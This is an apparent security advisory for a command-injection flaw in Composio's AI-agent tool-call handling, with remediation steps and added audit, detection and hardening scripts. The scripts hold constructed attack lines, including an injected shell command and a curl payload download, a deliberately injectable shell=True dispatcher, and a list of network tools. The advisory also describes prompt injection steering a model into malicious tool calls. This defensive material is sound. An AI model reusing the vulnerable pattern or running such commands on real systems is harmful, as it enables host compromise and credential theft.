CVE-2024-53526: Composio: command injection in AI agent tool calls
GHSA-8h93-28hg-fj84 | MEDIUM | PoC available

Composio versions 0.5.40 through 0.6.8 allow OS command injection through the handle_tool_calls function in the composio_openai, composio_claude and composio_julep plugins, so any AI agent pipeline that hands model output to these packages is exposed. Upgrade to 0.6.9. The CVSS scope metric is Changed (S:C): a compromised agent process reaches beyond the vulnerable library into the host and the services the agent can talk to. That is already priced into the 6.4 base score, but it means the practical blast radius is set by the agent's privileges and connectivity rather than by the library itself.
Risk Assessment
Rated Medium (CVSS v3.1 base 6.4), but contextually elevated for AI agent deployments. The vector is network-reachable, requires only low privileges and no user interaction, and the Changed scope means the blast radius extends beyond the vulnerable component. EPSS is low (0.75%) and the CVE is not in CISA KEV, but composio is widely adopted in agentic AI stacks, so the exposed population is material. Organizations running composio-based agents in production should treat the upgrade as high urgency.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| composio-claude | pip | >= 0.5.40, < 0.6.9 | 0.6.9 |
| composio-julep | pip | >= 0.5.40, < 0.6.9 | 0.6.9 |
| composio-openai | pip | >= 0.5.40, < 0.6.9 | 0.6.9 |
Recommended Action
1. Upgrade composio-openai, composio-claude, and composio-julep to >= 0.6.9.
2. If patching is blocked, restrict who can reach the agent-backed application (authentication, network allowlists) and apply compensating controls at the perimeter; until the fix is in, treat every input the model reads as attacker-controlled.
3. Audit all uses of handle_tool_calls in your codebase, including custom wrappers that replicate the pattern, so none are missed when the fixed version lands.
4. Detect exploitation by monitoring for anomalous subprocess spawning from AI agent processes: unexpected shell invocations, non-Python children of the Python interpreter, or lateral movement from agent hosts.
5. Apply least privilege to agent runtime environments (dedicated service account, no long-lived API keys in the process environment, restricted network egress) to limit the blast radius if exploitation succeeds.
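Steps 1 and 3 above come down to two checks: is a vulnerable version installed, and where does the code base call handle_tool_calls? The script below is an added example for this advisory, not composio project code. It assumes the affected range from the table (>= 0.5.40, < 0.6.9) and the three pip distribution names, and it scans a constructed source sample embedded inline; point `find_handle_tool_calls` at your own files in practice.

```python
"""Audit a host for the vulnerable composio plugins (CVE-2024-53526).

Added example for this advisory; not composio project code. Assumes the
affected range >= 0.5.40, < 0.6.9 and the three pip distribution names
from the advisory table. SAMPLE_SOURCE below is constructed, not real code.
"""
import ast
import re
from importlib import metadata

AFFECTED_PACKAGES = ("composio-openai", "composio-claude", "composio-julep")
FIRST_VULNERABLE = (0, 5, 40, 0)
FIRST_FIXED = (0, 6, 9, 0)


def parse_version(version: str) -> tuple:
    """Turn '0.6.8' or '0.6.9rc1' into a 4-tuple comparable with the bounds above.

    A pre-release of the fix (0.6.9rc1) predates the fix and must still be
    reported as vulnerable, so pre-releases rank below the final release.
    """
    m = re.match(r"^(\d+)(?:\.(\d+))?(?:\.(\d+))?(.*)$", version)
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    nums = [int(g) if g is not None else 0 for g in m.groups()[:3]]
    pre = -1 if re.match(r"^[.\-]?(a|b|rc|dev)", m.group(4)) else 0
    return tuple(nums) + (pre,)


def is_vulnerable(version: str) -> bool:
    return FIRST_VULNERABLE <= parse_version(version) < FIRST_FIXED


def check_installed() -> dict:
    """Map each affected distribution to (installed_version, vulnerable), or None if absent."""
    report = {}
    for dist in AFFECTED_PACKAGES:
        try:
            v = metadata.version(dist)
        except metadata.PackageNotFoundError:
            report[dist] = None
            continue
        report[dist] = (v, is_vulnerable(v))
    return report


class _ToolCallFinder(ast.NodeVisitor):
    """Collect line numbers of every call named handle_tool_calls (method or bare)."""

    def __init__(self):
        self.hits = []

    def visit_Call(self, node):
        f = node.func
        name = f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", None)
        if name == "handle_tool_calls":
            self.hits.append(node.lineno)
        self.generic_visit(node)


def find_handle_tool_calls(source: str) -> list:
    finder = _ToolCallFinder()
    finder.visit(ast.parse(source))
    return finder.hits


# Constructed sample: a direct call and a custom wrapper, the two shapes step 3 asks for.
SAMPLE_SOURCE = '''\
from composio_openai import ComposioToolSet
toolset = ComposioToolSet()
resp = client.chat.completions.create(model="gpt-4o", tools=tools, messages=msgs)
results = toolset.handle_tool_calls(resp)

def run_again(ts, r):
    # wrapper around the vulnerable entry point: needs the same review
    return ts.handle_tool_calls(r, entity_id="default")
'''

if __name__ == "__main__":
    for dist, state in check_installed().items():
        print(dist, "not installed" if state is None else f"{state[0]} vulnerable={state[1]}")
    print("handle_tool_calls called at lines:", find_handle_tool_calls(SAMPLE_SOURCE))
```

Run it on each agent host (or in CI against the lock file's resolved versions) and grep the AST scan over the repository; the wrapper in the sample is the case a plain `grep composio_openai` misses, since the call site imports nothing composio-specific.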
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2024-53526?
CVE-2024-53526 is an OS command injection in Composio versions 0.5.40 through 0.6.8, reachable through the handle_tool_calls function of the composio_openai, composio_claude and composio_julep plugins. Any AI agent pipeline that passes model output through these packages is exposed; the fix is version 0.6.9. The Changed scope (S:C) in the CVSS vector reflects that a compromised agent process can reach other components on the host and the services the agent is connected to.
Is CVE-2024-53526 actively exploited?
No in-the-wild exploitation is recorded: the CVE is not in CISA KEV and its EPSS score is 0.75%. Proof-of-concept exploit code is publicly available, however, which lowers the bar for exploitation.
How to fix CVE-2024-53526?
1. Upgrade composio-openai, composio-claude, and composio-julep to >= 0.6.9.
2. If patching is blocked, restrict who can reach the agent-backed application and apply compensating controls at the network perimeter.
3. Audit all uses of handle_tool_calls in your codebase, including custom wrappers that replicate the pattern.
4. Detect exploitation by monitoring for anomalous subprocess spawning from AI agent processes: unexpected shell invocations, non-Python children of the Python interpreter, or lateral movement from agent hosts.
5. Apply least privilege to agent runtime environments to limit the blast radius if exploitation succeeds.
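The detection in step 4 above, as an added example for this advisory (not composio code and not vendor detection content): build the process tree from exec events and flag shells, network tools and other non-Python children that descend from the agent's interpreter, while ignoring shells spawned elsewhere on the host. The event feed below is constructed; the field names mirror what auditd execve records or an eBPF exec tracer provide, and the `/srv/agent/` path used to recognise the agent process is an assumption you would replace with your own marker.

```python
"""Flag shells and network tools descended from an AI agent's Python process.

Added example for the advisory's detection step; not composio code.
EVENTS is a constructed exec-event feed (198.51.100.0/24 is a documentation
range); in production, feed real exec events into detect().
"""
import os

SHELLS = {"sh", "bash", "dash", "zsh"}
NETWORK_TOOLS = {"curl", "wget", "nc", "ncat", "socat"}
INTERPRETERS = {"python", "python3", "python3.11", "python3.12"}
# Assumption: the agent is recognised by this path in its command line.
AGENT_MARKERS = ("/srv/agent/",)

EVENTS = [
    {"ts": "2024-12-03T10:00:01Z", "pid": 4100, "ppid": 1,
     "exe": "/usr/bin/python3", "cmdline": "python3 /srv/agent/main.py"},
    {"ts": "2024-12-03T10:00:02Z", "pid": 900, "ppid": 1,
     "exe": "/usr/sbin/cron", "cmdline": "cron -f"},
    {"ts": "2024-12-03T10:02:17Z", "pid": 4120, "ppid": 4100,
     "exe": "/bin/sh", "cmdline": "sh -c ls -d /; echo INJECTED"},
    {"ts": "2024-12-03T10:02:18Z", "pid": 4121, "ppid": 4120,
     "exe": "/usr/bin/curl", "cmdline": "curl -s http://198.51.100.7/s -o /tmp/.s"},
    # a shell under cron: normal host activity, must not alert
    {"ts": "2024-12-03T10:05:00Z", "pid": 5000, "ppid": 900,
     "exe": "/bin/sh", "cmdline": "sh -c /usr/sbin/logrotate /etc/logrotate.conf"},
]


def is_agent_process(ev):
    return (os.path.basename(ev["exe"]) in INTERPRETERS
            and any(m in ev["cmdline"] for m in AGENT_MARKERS))


def agent_ancestor(ev, by_pid):
    """Nearest agent ancestor of ev, or None. The seen-set guards against pid-reuse loops."""
    seen = set()
    cur = by_pid.get(ev["ppid"])
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        if is_agent_process(cur):
            return cur
        cur = by_pid.get(cur["ppid"])
    return None


def detect(events):
    by_pid = {ev["pid"]: ev for ev in events}
    alerts = []
    for ev in events:
        if is_agent_process(ev):
            continue                      # the agent interpreter itself is expected
        anc = agent_ancestor(ev, by_pid)
        if anc is None:
            continue                      # shells with no agent ancestor are out of scope
        name = os.path.basename(ev["exe"])
        if name in SHELLS:
            reason = "shell spawned under agent process"
        elif name in NETWORK_TOOLS:
            reason = "network tool spawned under agent process"
        elif name not in INTERPRETERS:
            reason = "unexpected non-Python child of agent process"
        else:
            continue                      # Python children: tune to your agent's behaviour
        alerts.append({"ts": ev["ts"], "pid": ev["pid"], "agent_pid": anc["pid"],
                       "reason": reason, "cmdline": ev["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f'{a["ts"]} pid={a["pid"]} agent_pid={a["agent_pid"]} {a["reason"]}: {a["cmdline"]}')
```

The ancestry walk is what keeps the false-positive rate down: the rule fires on the curl launched from the injected shell two hops below the agent, but not on the logrotate shell under cron. Python children of the agent are deliberately not flagged here, since many agents legitimately spawn interpreters; if yours does not, move INTERPRETERS into the alerting branch.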
What systems are affected by CVE-2024-53526?
The three pip packages composio-openai, composio-claude and composio-julep in the 0.5.40 to 0.6.8 range, and therefore any AI/ML architecture built on them: agent frameworks, LLM tool-use pipelines, AI orchestration layers, multi-agent systems.
What is the CVSS score for CVE-2024-53526?
CVE-2024-53526 has a CVSS v3.1 base score of 6.4 (MEDIUM). The EPSS exploitation probability is 0.75%.
Technical Details
NVD Description
composio >=0.5.40 is vulnerable to Command Execution in composio_openai, composio_claude, and composio_julep via the handle_tool_calls function.
Exploitation Scenario
An attacker needs to influence the tool calls the model emits. The direct route is low-privilege access to an application backed by a composio agent: the attacker supplies input that the model echoes back into a tool call, for example arguments carrying shell metacharacters (semicolons, backticks, pipe operators), which handle_tool_calls then passes on to command execution without sanitization. The indirect route is prompt injection: instructions embedded in data the model ingests (emails, documents, web pages) make the model itself generate the malicious tool call, so no direct access to the application is needed. Either way the result is arbitrary command execution on the agent host, from which the attacker can pivot to connected services, read API keys from environment variables, or establish persistence. The advisory text does not spell out the exact sink; the linked issue #1073 and fix commit are the authoritative account.
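The generic mistake the scenario describes, beside a hardened form, as an added illustration for this advisory. This is not composio's code and does not claim to be the exact sink in composio; it shows the pattern in the abstract: a dispatcher that runs whatever tool name the model emits and interpolates the model's arguments into a shell string. The tool-call shape follows the OpenAI chat-completions format; the tool names, arguments and the `ls -d` handler are constructed for the example.

```python
"""Injectable tool dispatch beside a hardened one (added illustration, not composio code).

Constructed tool calls mirror the OpenAI chat-completions format. The
vulnerable dispatcher runs harmless commands (ls, echo) so the effect is
visible without doing damage; the point is that the model's text reaches sh.
"""
import json
import re
import subprocess

BENIGN_TOOL_CALL = {
    "id": "call_0", "type": "function",
    "function": {"name": "list_dir", "arguments": json.dumps({"path": "/"})},
}
# What a model emits when an attacker's text (direct or via prompt injection) lands in an argument.
MALICIOUS_TOOL_CALL = {
    "id": "call_1", "type": "function",
    "function": {"name": "list_dir", "arguments": json.dumps({"path": "/; echo INJECTED"})},
}
# A tool this agent was never offered, which a naive dispatcher still honours.
UNREGISTERED_TOOL_CALL = {
    "id": "call_2", "type": "function",
    "function": {"name": "shell_exec", "arguments": json.dumps({"cmd": "echo PWNED"})},
}


def vulnerable_dispatch(tool_call):
    """Trusts the model: any known name is run, and arguments go into a shell string."""
    fn = tool_call["function"]
    args = json.loads(fn["arguments"])
    if fn["name"] == "list_dir":
        cmd = "ls -d " + args["path"]        # metacharacters in path are honoured by sh
    elif fn["name"] == "shell_exec":
        cmd = args["cmd"]                    # a tool the agent was never meant to have
    else:
        raise KeyError(fn["name"])
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


ALLOWED_TOOLS = {"list_dir"}                 # exactly the tools offered to the model
SAFE_PATH = re.compile(r"^/[\w./-]*$")       # allowlist the argument shape, do not blocklist characters


def hardened_dispatch(tool_call, allowed=ALLOWED_TOOLS):
    """Return (True, stdout) or (False, reason). Never invokes a shell."""
    fn = tool_call["function"]
    if fn["name"] not in allowed:
        return False, f"tool {fn['name']!r} was not offered to the model"
    try:
        args = json.loads(fn["arguments"])
    except json.JSONDecodeError as e:
        return False, f"arguments are not valid JSON: {e}"
    if not isinstance(args, dict):
        return False, "arguments must be a JSON object"
    if fn["name"] == "list_dir":
        path = args.get("path")
        if not isinstance(path, str) or not SAFE_PATH.match(path):
            return False, "path failed validation"
        # argv list: the kernel receives ["ls", "-d", path]; nothing is parsed by sh
        res = subprocess.run(["ls", "-d", path], capture_output=True, text=True)
        if res.returncode != 0:
            return False, res.stderr.strip()
        return True, res.stdout
    return False, "no handler"


if __name__ == "__main__":
    print(repr(vulnerable_dispatch(MALICIOUS_TOOL_CALL)))     # listing plus INJECTED
    print(hardened_dispatch(MALICIOUS_TOOL_CALL))              # (False, 'path failed validation')
    print(hardened_dispatch(UNREGISTERED_TOOL_CALL))           # rejected by the tool allowlist
```

Three independent controls are at work in the hardened path, and each alone would have stopped one of the two attacks: the tool allowlist stops the model reaching a tool it was never given, argument validation stops hostile shapes before they reach any executor, and the argv form removes the shell parser so metacharacters are inert even if validation is wrong. Prompt injection makes the model's output attacker-controlled, so the dispatcher has to treat it with the same suspicion as a request body.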
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
References
- github.com/ComposioHQ/composio/blob/11ee7470aa6543097ee30bb036af8e9726dc7a85/python/plugins/claude/composio_claude/toolset.py
- github.com/ComposioHQ/composio/blob/11ee7470aa6543097ee30bb036af8e9726dc7a85/python/plugins/julep/composio_julep/toolset.py
- github.com/ComposioHQ/composio/blob/11ee7470aa6543097ee30bb036af8e9726dc7a85/python/plugins/openai/composio_openai/toolset.py
- github.com/ComposioHQ/composio/commit/f496f7fa776335ae7825cad2991c9b38923271fc
- github.com/ComposioHQ/composio/issues/1073
- github.com/ComposioHQ/composio/pull/1107
- github.com/advisories/GHSA-8h93-28hg-fj84
- nvd.nist.gov/vuln/detail/CVE-2024-53526
Related Vulnerabilities
- CVE-2025-59528 (10.0) Flowise: Unauthenticated RCE via MCP config injection (same attack type: Supply Chain)
- CVE-2024-2912 (10.0) BentoML: RCE via insecure deserialization (CVSS 10) (same attack type: Supply Chain)
- CVE-2023-3765 (10.0) MLflow: path traversal allows arbitrary file read (same attack type: Supply Chain)
- CVE-2025-5120 (10.0) smolagents: sandbox escape enables unauthenticated RCE (same attack type: Supply Chain)
- CVE-2026-21858 (10.0) n8n: Input Validation flaw enables exploitation (same attack type: Code Execution)